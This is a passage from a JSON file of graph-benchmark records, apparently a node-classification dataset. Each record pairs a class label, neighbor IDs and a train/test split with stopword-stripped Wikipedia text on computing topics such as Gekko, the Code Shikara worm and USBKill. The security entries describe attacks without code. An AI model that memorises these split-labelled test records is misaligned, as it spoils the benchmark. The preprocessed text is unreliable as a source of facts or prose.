e-research tools national research cloud known nectar cloud 10,000 users three organisations created aligned set investments business plans 2017/8 order integrate work line 2016 national research infrastructure ncris roadmap created department education training monash university remains lead agent ands university queensland lead agent rds university melbourne lead agent nectar",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4019,
    "label": 9,
    "text": "Gekko_(optimization_software):gekko optimization software gekko python package solves large-scale mixed-integer differential algebraic equations nonlinear programming solvers ipopt apopt bpopt snopt minos modes operation include machine learning data reconciliation real-time optimization dynamic simulation nonlinear model predictive control addition package solves linear programming lp quadratic programming qp quadratically constrained quadratic program qcqp nonlinear programming nlp mixed integer programming mip mixed integer linear programming milp gekko available python installed pip pypi python software foundation gekko works platforms python 2.7 3+ default problem sent public server solution computed returned python windows macos linux arm raspberry pi processor options solve without internet connection gekko extension apmonitor optimization suite integrated modeling solution visualization directly within python mathematical model expressed terms variables equations hock schittkowski benchmark problem 71 used test performance nonlinear programming solvers particular optimization problem objective function formula_1 subject inequality constraint formula_2 equality constraint formula_3 four variables must lower bound 1 upper bound 5 initial guess values formula_4 optimization problem solved gekko shown applications include cogeneration power heat drilling automation severe slugging control solar thermal energy production solid oxide fuel cells flow assurance enhanced oil recovery essential oil extraction unmanned aerial vehicles uavs many references apmonitor gekko sample types applications solved gekko developed national science foundation nsf research grant 1547110 detailed special issue collection combined scheduling control notable mentions gekko listing decision tree optimization software added support apopt bpopt solvers projects reports online dynamic optimization course international participants gekko topic online forums users solving optimization optimal control problems gekko used advanced control temperature control lab tclab process control education 20 universities one application machine learning perform regression training data build correlation example deep learning generates model training data generated function formula_5 artificial neural network three layers used example first layer linear second layer hyperbolic tangent activation function third layer linear program produces parameter weights minimize sum squared errors measured data points neural network predictions points gekko uses gradient-based optimizers determine optimal weight values instead standard methods backpropagation gradients determined automatic differentiation similar popular packages problem solved constrained optimization problem converged solver satisfies karush–kuhn–tucker conditions using gradient-based optimizer allows additional constraints may imposed domain knowledge data system neural network model tested across range training data well extrapolation demonstrate poor predictions outside training data predictions outside training data set improved hybrid machine learning uses fundamental principles available impose structure valid wider range conditions example hyperbolic tangent activation function hidden layer 2 could replaced sine cosine function improve extrapolation final part script displays neural network model original function sampled data points used fitting optimal control use mathematical optimization obtain policy constrained differential formula_6 equality formula_7 inequality formula_8 equations minimizes objective/reward function formula_9 basic optimal control solved gekko integrating objective transcribing differential equation algebraic form orthogonal collocation finite elements",
    "neighbors": [
      5830,
      329,
      8554,
      7983,
      1039,
      8113,
      9915,
      6718
    ],
    "mask": "Test"
  },
  {
    "node_id": 4020,
    "label": 7,
    "text": "Techila_Grid:techila grid techila distributed computing engine earlier known techila grid commercial grid computing software product speeds simulation analysis computational applications enabling scalability across resources user on-premises data center user cloud account techila distributed computing engine developed licensed techila technologies ltd privately held company headquartered tampere finland product also available on-demand solution google cloud launcher online marketplace created operated google according idc solution enables organizations create hpc infrastructure without major capital investments operating expenses required new hpc hardware techila distributed computing engine distributed computing middleware management solution used access manage on-premises cloud resources various high-performance computing hpc computing uses including high-throughput computing htc scenarios creates scalable computing service execution environment also support applications deployed within production environments technology techila distributed computing engine built autonomic computing architecture patented techila technologies enabled features automated system management fault tolerance simplify deployment use administration large-scale distributed computing systems techila distributed computing engine includes techila distributed computing engine set limitations physical location distance computing resources used system product description techila distributed computing engine lists three supported system designs techila technologies offers also tools enable automated provisioning integration cloud-based resources grid techila server java-based software product optimizes performance techila distributed computing engine environment jobs optimization done techila server supports large jobs also makes system suitable running small computational jobs performance techila distributed computing engine different scenarios evaluated thesis tampere university technology originally techila server delivered embedded appliance embedded appliance product discontinued 2012 currently techila server delivered either virtual appliance using cloud-specific deployment tools techila worker software agent must installed computer participate techila distributed computing engine environment computers physical virtualized computers running hypervisor cloud virtual machine techila distributed computing engine supports following public cloud services microsoft azure amazon ec2 amazon elastic compute cloud google compute engine techila worker software installed computer authenticate computer techila server using certificate system use self-management automatically configure computer run jobs received techila server techila worker java-based client middleware component run microsoft windows linux client computers participating techila distributed computing engine system different hardware software platforms techila worker software runs lowest possible priority computer techila worker also interoperable batch-queuing systems like slurm torque oracle grid engine previously known sun grid engine sge interoperability allows existing hpc users use existing infrastructures part techila distributed computing engine system without techila worker interfering system techila sdk earlier known techila grid management kit techila gmk library software components connect applications techila distributed computing engine environment sdk includes plug-ins many commonly used research development tools languages matlab r python perl java c .net c/ c++ fortran command-line interface script applications developed using application programming interfaces techila sdk also deployed within production environments run service soa environment techila sdk supports windows linux operating systems web-based administrator user interface provides administrators simplified easy-to-use interface techila server administrator user interface allows monitoring system activity view control job execution execution policy monitor control techila workers techila worker groups control security settings manage users techila technologies says development techila distributed computing engine technology started initially vision grid computing enablement fast simulation analysis without complexity traditional high-performance computing security techila distributed computing engine evaluated nixu ltd 2008 nixu finland largest specialist company information security consulting many global corporates customers techila distributed computing engine accepted security-sensitive industry sectors finance insurance engineering pharmaceutical techila distributed computing engine demonstrated research team university helsinki 2011 capable providing autonomic management computing environments large numbers windows azure cloud instances university helsinki also demonstrated techila distributed computing engine ability enhance usability utilization large-scale cluster resources projects implemented using matlab r python java c/ c++/ c techila distributed computing engine system computational resources arranged device groups organizational security compliance administrative control despite performance large-scale systems csc center science also suitable smaller environments tutgrid utilizes idle capacity desktop pcs computers tampere university technology tut scientific computing",
    "neighbors": [
      5956,
      8582,
      5833,
      8554,
      940,
      5677,
      6797,
      1935,
      7983,
      3573,
      2710,
      823,
      8122,
      2045,
      7326
    ],
    "mask": "Test"
  },
  {
    "node_id": 4021,
    "label": 3,
    "text": "Jose_Duato:jose duato josé francisco duato marín alberic valencia 1958 spanish professor researcher awarded national prize research julio rey pastor 2009 king jaime prize new technologies 2006 research based mainly field interconnection networks develops role full professor department computer engineering disca polytechnic university valencia first author book interconnection networks engineering approach published united states ieee computer society press 1997 morgan kaufmann 2002 quoted book interconnection networks existence today 1400 citations used engineers designing interconnection networks market-leading companies ibm compaq intel sun microsystems provide doctoral programs especially united states co-author chapter interconnection networks fourth edition book computer architecture quantitative approach john hennessy dave patterson widely used cited book computer architecture available today 8000 citations total 2009 prof. duato received prestigious national award “ julio rey pastor “ field mathematics information technologies communications contributions international importance field interconnection networks transference results industry",
    "neighbors": [
      9665,
      3323,
      9932
    ],
    "mask": "None"
  },
  {
    "node_id": 4022,
    "label": 6,
    "text": "United_States_v._Fricosu:united states v. fricosu united states v. fricosu 841 f.supp.2d 1232 d. col 2012 federal criminal case colorado addressed whether person compelled reveal encryption passphrase password despite u.s. constitution fifth amendment protection self-incrimination january 23 2012 judge robert e. blackburn held writs act fricosu required produce unencrypted hard drive fricosu attorney claimed possible remember password month later fricosu ex-husband handed police list potential passwords one passwords worked rendering self-incrimination issue moot electronic frontier foundation filed amicus brief support fricosu fricosu subsequently entered plea agreement 2013 meaning question defendant right resist mandatory decryption addressed higher court time future case addressing issue arises",
    "neighbors": [
      7040,
      3629,
      4022
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4023,
    "label": 4,
    "text": "Code_Shikara:code shikara code shikara hassan arshad computer worm related dorkbot family attacks social engineering 2011 code first identified danish cyber security company csis av-company sophos reported november 2011 threat mainly spreads malicious links social network facebook 2013 bitdefender labs caught blocked worm capable spying users browsing activities meanwhile stealing personal online/offline information and/or credentials commonly known cybercrime infection originally flagged online backup service mediafire detected worm distributed camouflaged image file despite misleading extension mediafire successfully identified malicious image .exe-file malicious shikara code poses .jpeg image indeed executable file irc bot malware simply integrated attackers control command server besides stealing usernames passwords bot herder may also order additional malware downloads mediafire taken steps address incorrect misleading file extensions update identifies displays short description identifying specific file types help users specific threat file sharing service also blocks files double extensions .jpg.exe .png.exe .bmp.exe like usual malware backdoor.ircbot.dorkbot update installed victim computer related devices biggest risk someone facebook contacts may account already compromised due sloppy password security granting access rogue application account user allured clicking link seemingly posted one friends although links pretend point image truth malicious screensaver hidden behind icon two blonde women code launched attempts download malicious software hosted specific compromised israeli domain malware currently present israeli website remains message seemingly intruders says likely using additional websites continuing spreading cyber attack popular baits tricking users click malicious links include rihanna taylor swift sex tapes",
    "neighbors": [
      3072,
      3969,
      6786,
      7809,
      7044,
      10245,
      10756,
      8,
      9356,
      9233,
      8978,
      4863,
      4883,
      8959,
      278,
      10392,
      1690,
      3867,
      2075,
      10141,
      5281,
      2213,
      6565,
      8998,
      9256,
      939,
      9771,
      1970,
      10166,
      3643,
      6588,
      7739,
      9791,
      1088,
      3395,
      4165,
      2508,
      4945,
      467,
      7515,
      9055,
      4344,
      3941,
      107,
      877,
      4081,
      3320,
      2041,
      5245,
      1279
    ],
    "mask": "Test"
  },
  {
    "node_id": 4024,
    "label": 3,
    "text": "GoWarrior:gowarrior gowarrior open-source community-supported computing platform gowarrior designed world makers hackers educators hobbyists newbies build electronics projects offers complete package hardware software cloud service tiger board single-board computer performs hardware gowarrior platform contains arm cortex a9 based m3733-afaaa soc arm mali-400 mp2 well integrated 1gb ddr3 ram gowarrior specifications godroid android kitkat 4.4.4. based optimized operating system gowarrior platform addition original android functionalities godroid pre-integrates useful middleware components libraries well self-developed function blocks makes also software development kit android applications godroid supports booting nand flash microsd card contains boot code image files replacing android native media engine stagefright gstreamer utilizing hardware acceleration facilities godroid supports various audio/video/container hardware decoding multiple network protocols including microsoft smooth streaming http live streaming kodi 14.2 variety supported video/audio plug-ins besides screen mirroring function android miracast godroid also implements dlna system service sharing digital media among multimedia devices dmr dms dmp supported addition c/c++/java godroid also integrates qpython2engine python2 programming android tiger board provides 2 sets 40-pin expansion headers one compatible raspberry pi connector raspberry pi python applications ported run godroid godroid supports android studio application ide api level 19 configuration match godroid provides availability original android api also proprietary extended api gpio/ic2/spi/pwm godroid supports standard adb debugging via ethernet wi-fi usb gobian linux-embedded operating system running tiger board gowarrior platform gobian developed based raspbian debian 7 wheezy armhf differs raspbian extra features example gobian encapsulates rpi.gpio i/o libraries facilitate transplanting projects use related libraries raspberry pi tiger board furthermore gobian provides support multimedia integrating gof kodi middle-ware modules applications out-of-the-box gobian enables internet connection ethernet wi-fi ethernet port wi-fi module tiger board thus supports various methods access projects transfer data ftp ssh gobian automatically synchronizes system time internet time servers using ntp protocol gobian integrates built-in file system data management c c++ python perl shell script gobian lets call gpio/i2c/uart/spi interfaces directly projects built-in rpi.gpio libraries gobian makes easy secondary development multimedia applications customized gof middle-ware tiger board on-board m3733-afaaa processor makes gobian multitasking system good performance software programs available debian basically compatible gobian gobian supports ultra-power-saving sleep mode pmu standby entire board power consumption low 0.35w gobian integrates dlna fully support multimedia sharing multi-screen interaction gowarrior community already launched support projects gobian cloudq comprehensive back-end community support help users easily build projects",
    "neighbors": [
      8582,
      1427,
      10387,
      2838,
      11674,
      10658,
      5677,
      8122,
      7745,
      7364,
      11601,
      11487,
      4194,
      3045,
      10341,
      8554,
      8940,
      1776,
      2811,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4025,
    "label": 9,
    "text": "Alain_Colmerauer:alain colmerauer alain colmerauer 24 january 1941 – 12 may 2017 french computer scientist professor aix-marseille university creator logic programming language prolog alain colmerauer born 24 january 1941 carcassonne graduated grenoble institute technology earned ph.d. ensimag grenoble colmerauer spent 1967–1970 assistant professor university montreal created q-systems one earliest linguistic formalisms used development taum-meteo machine translation prototype developing prolog iii 1984 one main founders field constraint logic programming colmerauer became associate professor aix-marseille university luminy 1970 promoted full professor 1979 1993 1995 head laboratoire d'informatique de marseille lim joint laboratory centre national de la recherche scientifique university de provence university de la mediterranee despite retiring emeritus professor 2006 remained member artificial intelligence taskforce luminy colmerauer award regional council provence-alpes-côte d'azur 1985 michel monpetit award french academy sciences 1986 made knight legion honour french government became fellow american association artificial intelligence 1991 received acp research excellence award principles practice constraint programming 2008 also correspondent french academy sciences area mathematics colmerauer died 12 may 2017",
    "neighbors": [
      5187,
      8421,
      4774,
      1672,
      3276,
      9264,
      1269,
      8057,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 4026,
    "label": 7,
    "text": "Cluster-aware_application:cluster-aware application cluster-aware application software application designed call cluster apis order determine running state case manual failover triggered cluster nodes planned technical maintenance automatic failover required computing cluster node encounters hardware software failure maintain business continuity cluster-aware application may capable failing lan wan",
    "neighbors": [
      4274,
      3450,
      5658
    ],
    "mask": "Train"
  },
  {
    "node_id": 4027,
    "label": 4,
    "text": "February_2010_Australian_cyberattacks:february 2010 australian cyberattacks february 2010 australian cyberattacks series denial-of-service attacks conducted anonymous online community australian government response proposed web censorship regulations operation titstorm name given cyber attacks perpetrators resulted lapses access government websites 10 11 february 2010 accompanied emails faxes phone calls harassing government offices actual size attack number perpetrators involved unknown estimated number systems involved ranged hundreds thousands amount traffic caused disruption multiple government websites australian telecommunications minister stephen conroy proposed regulations would mainly filter sites pornographic content various groups advocating uncensored access internet along companies like google yahoo object proposed filter spokesperson conroy said actions legitimate form protest called irresponsible attacks also drew criticism filter protest groups initial stage followed small in-person protests 20 february called project freeweb attack began protest responding plan australian telecommunications minister stephen conroy would require internet service providers block australian users accessing illegal government deemed unwanted content websites blocked feature pornography showing rape bestiality child sex abuse small-breasted women may appear legal age female ejaculation drawn depictions acts included proposal proposed filter also includes gambling sites along others showing drug use leaked version proposed blacklist also referred refused classification rc list also showed sites include adult content name operation titstorm reference material would censored google questioned proposal saying prohibitions would broad strongly opposed free speech groups poll conducted mcnair ingenuity research hungry beast television program found 80 1,000 respondents favour concept plan survey also found 91 concerned government intent keep list filtered websites secret department defence cyber security operations centre discovered attack coming 5 february statement released anonymous press two days attack said government right refuse citizens access information solely perceive 'unwanted went read australian government learn one mess porn one messes access perfectly legal illegal content reason anonymous previously garnered media attention protests church scientology project chanology iranian government september 2009 prime minister kevin rudd website hacked similar protest proposed web censorship reforms flyers distributed recruit participants said attack begin 8 pm aest 10 february day government websites targeted denial-of-service attacks communications department said hackers infiltrated government security instead swamped government computer servers sites left unavailable sporadic periods throughout attack one point australian parliament website offline two days due high volume requests rudd government site also inaccessible time primary target communications department also received large amount traffic government offices also flooded e-mail spam junk faxes prank phone calls prime minister homepage vandalized pornographic images flyer released attack called faxes focus cartoon pornography female ejaculation small-breasted pornography reports actual size attack varied one cyber security expert described attacks equivalent parking truck across driveway shopping centre firm marketing security technology said peak attack relatively low 16.84 megabits per second one writer described 7.5 million requests per second initially brought parliament website massive site usually receives hundred per second appears botnets made compromised computers used estimates number attacking systems involved ranged hundreds thousands spokeswoman conroy said attacks legitimate political protest according totally irresponsible potentially deny services australian public systems administrators guild australia said condemned ddos attacks wrong way express disagreement proposed law anti-censorship groups criticised attacks saying hurt cause purported spokesperson attackers recommended wider australian public protest filter signing petition electronic frontiers australia anonymous coordinated second phase small protests outside parliament house canberra major cities throughout australia 20 february additional demonstrations held country embassies overseas organizers called follow-up protests project freeweb differentiate criticised cyber attacks several supporters attack later said messageboard taking websites enough convince government back web filtering policy called violence others disagreed actions proposed launching additional attack popular government site spokesman electronic frontiers australia said believed real intention capacity follow violent threats attack also resulted criticism australia terrorism laws university new south wales law journal one writer wrote provisions leave place legitimate acts online protest least sets penalty far high relatively minor cyber-vandalism australian teenager charged four counts inciting hackers impair electronic communications two unauthorised access restricted data role attack ordered pay bond instead convicted pleading guilty showing good behaviour july 2010 conroy delayed implementing plan pending 12-month review refused classification content rated proposal expected go forward due opposition coalition greens internet service providers telstra optus agreed voluntarily block content",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      8735,
      9761,
      4644,
      4133,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      4883,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6484,
      857,
      1882,
      7515,
      2409,
      3956,
      9082,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      507,
      9727
    ],
    "mask": "Test"
  },
  {
    "node_id": 4028,
    "label": 0,
    "text": "Conceptual_dependency_theory:conceptual dependency theory conceptual dependency theory model natural language understanding used artificial intelligence systems roger schank stanford university introduced model 1969 early days artificial intelligence model extensively used schank students yale university robert wilensky wendy lehnert janet kolodner schank developed model represent knowledge natural language input computers partly influenced work sydney lamb goal make meaning independent words used input i.e two sentences identical meaning would single representation system also intended draw logical inferences model uses following basic representational tokens set conceptual transitions act representation e.g atrans used represent transfer give take ptrans used act locations move go mtrans represents mental acts tell etc sentence john gave book mary represented action atrans two real world objects john mary",
    "neighbors": [
      2167
    ],
    "mask": "None"
  },
  {
    "node_id": 4029,
    "label": 9,
    "text": "Sysquake:sysquake sysquake numerical computing environment based programming language mostly-compatible matlab offers facilities interactive graphics give insights problems analyzed used teaching research engineering sysquake supports two kinds codes libraries collections related functions extend sysquake capabilities sq files applications interactive graphics menus sysquake pro also extended plugins several applications share large part sysquake code libraries usually compatible applications",
    "neighbors": [
      8262,
      6797,
      7983,
      2804,
      823,
      7326
    ],
    "mask": "None"
  },
  {
    "node_id": 4030,
    "label": 3,
    "text": "Explicit_data_graph_execution:explicit data graph execution explicit data graph execution edge type instruction set architecture isa intends improve computing performance compared common processors like intel x86 line edge combines many individual instructions larger group known hyperblock hyperblocks designed able easily run parallel parallelism modern cpu designs generally starts plateau eight internal units one four cores edge designs intend support hundreds internal units offer processing speeds hundreds times greater existing designs major development edge concept led university texas austin darpa polymorphous computing architectures program stated goal producing single-chip cpu design 1 tflops performance 2012 yet realized 2018 almost computer programs consist series instructions convert data one form another instructions require several internal steps complete operation time relative performance cost different steps changed dramatically resulting several major shifts isa design 1960s memory relatively expensive cpu designers produced instruction sets densely encoded instructions data order better utilize resource instance codice_1 instruction would provided many different forms would gather b different places main memory indexes registers providing different instructions allowed programmer select instruction took least possible room memory reducing program needs leaving room data instruction set tried provide every possible access mode every possible instruction like dec vax known orthogonal considered paragon design style memory access wide variety modes led instruction sets hundreds different instructions style known today cisc complex instruction set computing late 1970s memory become cheap cost lower performance cpu designs ran many times faster memory talked new regime orthogonality became undesirable versions instructions took room cpu little nothing improve performance communicated slow memory time memory savings unnecessary period risc reduced instruction set computing design philosophy flourished basic aim reduce access memory much possible using internal high-performance registers instructions side-effect wide variety different modes instructions disappeared might one codice_2 instruction instead many removing instructions reduced complexity instruction decoder freed considerable space cpu space used greatly increase number registers 1990s chip design fabrication process grew point possible build commodity processor every potential feature built improve performance cpu designs started adding internal parallelism becoming superscalar program instructions work unrelated data adding functional units instructions run time new portion cpu scheduler looks independent instructions feeds units taking outputs re-ordering externally appears ran succession amount parallelism extracted superscalar designs limited number instructions scheduler examine interdependencies examining greater number instructions improve chance finding instruction run parallel cost increasing complexity scheduler despite massive efforts cpu designs using classic risc cisc isa plateaued three four functional units additional performance wrung systems examining instructions find ones operate different types data adding units dedicated sort data led introduction floating point units recently single instruction multiple data simd units drawback approach makes cpu less generic feeding cpu program uses almost floating point instructions instance bog fpus units sit idle recent problem modern cpu designs delay talking registers general terms size cpu die remained largely time size units within cpu grown much smaller units added means relative distance one function unit global register file grown time introduced order avoid delays talking main memory global register file become delay worth avoiding delays talking memory price fell suggested radical change isa instruction set architecture cisc risc designers considering whether problems scaling parallelism increasing delays talking registers demands another switch basic isa among ways introduce new isa long instruction word vliw architectures typified itanium vliw moves scheduler logic cpu compiler much memory longer timelines examine instruction stream static placement static issue execution model works well delays known presence cache latencies filling instruction words proven difficult challenge compiler instruction might take five cycles data cache could take hundreds compiler way know whether data cache runtime determined overall system load factors nothing program compiled key performance bottleneck traditional designs data instructions operate theoretically scattered memory memory performance dominates overall performance classic dynamic placement dynamic issue designs seem reached limit performance capabilities vliw uses static placement static issue model proven difficult master runtime behavior programs difficult predict properly schedule advance edge architectures new class isa based static placement dynamic issue design edge systems compile source code form consisting statically-allocated hyperblocks containing many individual instructions hundreds thousands hyperblocks scheduled dynamically cpu edge thus combines advantages vliw concept looking independent data compile time superscalar risc concept executing instructions data becomes available vast majority real-world programs linkage data instructions obvious explicit programs divided small blocks referred subroutines procedures methods depending era programming language used generally well-defined entrance exit points data passed information lost high level language converted processor much simpler isa information useful modern compilers generalized concept basic block attempting identify within programs optimize memory access registers block instructions control statements predicated instructions dataflow graph encoded using blocks specifying flow data one block instructions another storage area basic idea edge directly support operate blocks isa level since basic blocks access memory well-defined ways processor load related blocks schedule output one block feeds directly one consume data eliminates need global register file simplifies compiler task scheduling access registers program whole instead basic block given local registers compiler optimizes access within block much simpler task edge systems bear strong resemblance dataflow languages 1960s–1970s 1990s dataflow computers execute programs according dataflow firing rule stipulates instruction may execute time operands available due isolation data similar edge dataflow languages inherently parallel interest followed general interest massive parallelism solution general computing problems studies based existing cpu technology time demonstrated would difficult dataflow machine keep enough data near cpu widely parallel precisely bottleneck modern fabrication techniques solve placing hundreds cpu memory single die another reason dataflow systems never became popular compilers era found difficult work common imperative languages like c++ instead dataflow systems used dedicated languages like prograph limited commercial interest decade compiler research eliminated many problems key difference dataflow edge approaches edge designs intend work commonly used languages edge-based cpu would consist one small block engines local registers realistic designs might hundreds units units interconnected using dedicated inter-block communication links due information encoded block compiler scheduler examine entire block see inputs available send engine execution need examine individual instructions within small increase complexity scheduler examine multiple blocks see outputs one fed inputs another place blocks units reduce inter-unit communications delays modern cpu examines thousand instructions potential parallelism complexity edge allows examine thousand hyperblocks one consisting hundreds instructions gives scheduler considerably better scope additional cost pattern operation gives concept name graph string blocks connected data flowing another advantage edge concept massively scalable low-end design could consist single block engine stub scheduler simply sends blocks called program edge processor intended desktop use would instead include hundreds block engines critically changes designs physical layout chip private information known scheduler program written single-unit machine would run without changes desktop version albeit thousands times faster power scaling likewise dramatically improved simplified block engines turned required linear effect power consumption perhaps greatest advantage edge concept suitable running sort data load unlike modern cpu designs different portions cpu dedicated different sorts data edge cpu would normally consist single type alu-like unit desktop user running several different programs time would get much parallelism scientific user feeding single program using floating point cases scheduler would simply load every block could units low level performance individual block engines would match dedicated fpu instance would attempt overwhelm advantage massive parallelism university texas austin developing edge isa known trips order simplify microarchitecture cpu designed run trips isa imposes several well-defined constraints trips hyperblock trips compiler statically bundles instructions hyperblocks also statically compiles blocks run particular alus means trips programs dependency precise implementation compiled 2003 produced sample trips prototype sixteen block engines 4 4 grid along megabyte local cache transfer memory single chip version trips fabbed ibm canada using 130 nm process contains two grid engines along shared level-2 cache various support systems four chips gigabyte ram placed together daughter-card experimentation trips team set ultimate goal producing single-chip implementation capable running sustained performance 1 tflops 50 times performance high-end commodity cpus available 2008 dual-core xeon 5160 provides 17 gflops cmu cash compiler produces intermediate code called pegasus cash trips similar concept cash targeted produce output specific architecture therefore hard limits block layout university washington wavescalar architecture substantially similar edge statically place instructions within waves instead special instructions phi rho mark boundaries waves allow scheduling",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      9330,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      3323,
      8700,
      7940,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      1952,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      453,
      3014,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 4031,
    "label": 8,
    "text": "StormCrawler:stormcrawler stormcrawler open-source collection resources building low-latency scalable web crawlers apache storm provided apache license written mostly java programming language stormcrawler modular consists core module provides basic building blocks web crawler fetching parsing url filtering apart core components project also provide external resources like instance spout bolts elasticsearch apache solr parserbolt uses apache tika parse various document formats project used production various companies linux.com published q october 2016 author stormcrawler infoq ran one december 2016 comparative benchmark apache nutch published january 2017 dzone.com several research papers mentioned use stormcrawler 2018 particular project wiki contains list videos slides available online stormcrawler used notably common_crawl generating large publicly available dataset news",
    "neighbors": [
      5677,
      8718,
      113,
      8408,
      1913,
      6458
    ],
    "mask": "Test"
  },
  {
    "node_id": 4032,
    "label": 4,
    "text": "USBKill:usbkill usbkill anti-forensic software distributed via github written python bsd linux os x operating systems designed serve kill switch computer installed fall control individuals entities owner operator wish free software available gnu general public license program developer goes online name hephaest0s created response circumstances arrest silk road founder ross ulbricht u.s. federal agents able get access incriminating evidence laptop without needing cooperation copying data flash drive distracting maintains whitelist devices allowed connect computer usb ports device whitelist connects take actions ranging merely returning lock screen encrypting hard drive even deleting data however also used part computer security regimen prevent surreptitious installment malware spyware clandestine duplication files according creator law enforcement agencies began making computer crime arrests 1990s would often ask judges knock search warrants order deny targets time delete incriminating evidence computers storage media extreme circumstances likely targets could get advance notice arriving police judges would grant power-off warrants allowing utilities turn electricity location raid shortly beforehand forestalling efforts destroy evidence could seized methods effective criminals produced distributed pirated software movies primary large-scale computer crime era 2010s circumstances computer crime changed along legitimate computer use criminals likely use internet facilitate crimes needed remain online time still keep activities discreet used computer security features like lock screens password protection reasons law enforcement attempts apprehend suspected cybercriminals computers use accounts computer online open logged thus easily searchable succeed seizing computer condition methods available bypass password protection may take time police available may legally possible compel suspect relinquish password—in united states many computer-crime investigations take place courts distinguished forcing suspect use material means protecting data thumbprint retinal scan key opposed password passcode purely product suspect mental processes thus protected compelled disclosure fifth amendment usual technique authorities either public entities law enforcement private organizations like companies seizing computer usually laptop believe used improperly first physically separate suspect user computer enough touch prevent closing lid unplugging typing command done often install device usb port spoofs minor actions mouse touchpad keyboard preventing computer going sleep mode would usually return lock screen would require password one program commonly used purpose mouse jiggler agents u.s. federal bureau investigation fbi investigating ross ulbricht founder online black market silk road learned often ran site laptop using wireless networks available branches san francisco public library enough evidence arrest planned catch act running silk road computer logged needed make sure able trigger encryption delete evidence october 2013 male female agent pretended lovers quarrel near working glen park branch according business insider ulbricht distracted got see problem whereupon female agent grabbed laptop male agent restrained ulbricht female agent able insert flash drive one laptop usb ports software copied key files according joshuah bearman wired third agent grabbed laptop ulbricht distracted apparent lovers fight handed agent tom kiernan response circumstances ulbricht arrest programmer known hephaest0s developed usbkill code python uploaded github 2014 available free software gnu general public license currently runs linux os x program installed prompts user create whitelist devices allowed connect computer via usb ports checks default sample rate rate adjusted user may also choose actions computer take detects usb device whitelist default shuts erases data ram swap file users need logged root hephaest0s cautions users must using least partial disk encryption along usbkill fully prevent attackers gaining access gizmodo suggests using virtual machine present computer reboots also used reverse whitelisted flash drive usb port attached user wrist via lanyard serving key instance flash drive forcibly removed program initiate desired routines designed one thing wrote aaron grothe short article usbkill pretty well precaution suggests users rename something innocuous loaded computers case someone might looking seized computer order disable addition designed purpose hephaest0s suggests uses possibly connected user desire frustrate police prosecutors part general security regimen could used prevent surreptitious installation malware spyware copying files protected computer also recommended general use part robust security practice even threats feared 2600 article grothe shared patch also included feature devised allowing program shut network non-whitelisted usb inserted terminal nate brune another programmer created silk guardian version usbkill takes form loadable kernel module since felt could implemented better already issue 2600 following grothe article another writer going name jack d. ripper explained ninja os operating system designed live flash drives handles issue uses bash script resident memory cycles loop boot device i.e. flash drive three times second see still mounted reboots computer",
    "neighbors": [
      5000,
      7188,
      5397,
      10392,
      3629,
      7983,
      823,
      4163,
      2630,
      7369,
      2383,
      10195,
      11221,
      7515,
      9055,
      7519,
      8554,
      7794,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 4033,
    "label": 4,
    "text": "Octopussy_(software):octopussy software octopussy also known 8pussy free open-source computer-software monitors systems constantly analyzing syslog data generate transmit central octopussy server thus often called siem solution therefore software like octopussy plays important role maintaining within iso/iec 27001-compliant environments octopussy ability monitor device supports syslog protocol servers routers switches firewalls load balancers important applications services main purpose software alert administrators users different kinds events like system outages attacks systems errors applications however unlike nagios icinga octopussy state-checker therefore problems resolved within application software also makes prescription whatsoever messages must be/must analyzed octopussy seen less powerful popular commercial software category event monitoring log analysis octopussy compatible lot linux system distributions like debian ubuntu opensuse centos rhel even meta-distributions gentoo arch linux although octopussy originally designed run linux could ported unix variants like freebsd minimal effort octopussy extensive report generating features also various interfaces software like e.g nsca nagios jabber/xmpp zabbix help software like snare even windows eventlogs processed octopussy licensed terms gnu general public license although octopussy free open-source software variety characteristics also found professional enterprise applications like splunk sawmill kiwi syslog time writing octopussy comes following set features meta- services supported by/known octopussy apache 2 bind bsd kernel bsd pam bsd system cisco routers asr cisco switches clamav denyall reverse proxy drbd f5 bigip fortinet fw hp-tools ironport mailserver juniper netscreen fw juniper netscreen nsm ldap linux apparmor linux auditd linux iptables linux kernel linux pam linux system monit mysql nagios neoteris/juniper fw netapp netcache postfix postgresql samba samhain snmpd squid sshd syslog-ng tacacs vmware esx windows snare agent windows system xen ... events receivable services thus processible octopussy include software requires rsyslog installed syslog-server expects systems monitored run one numerous available syslog services like e.g syslogd/klogd rsyslog syslog-ng software depends apache 2 http server installed apache :asp mod_perl mod_ssl octopussy also requires mysql dbms actual database installed/copied octopussy setup well recent perl interpreter installed operating system variety perl modules cpan e.g crypt :passwdmd5 dbd :mysql json unix :syslog xml :simple 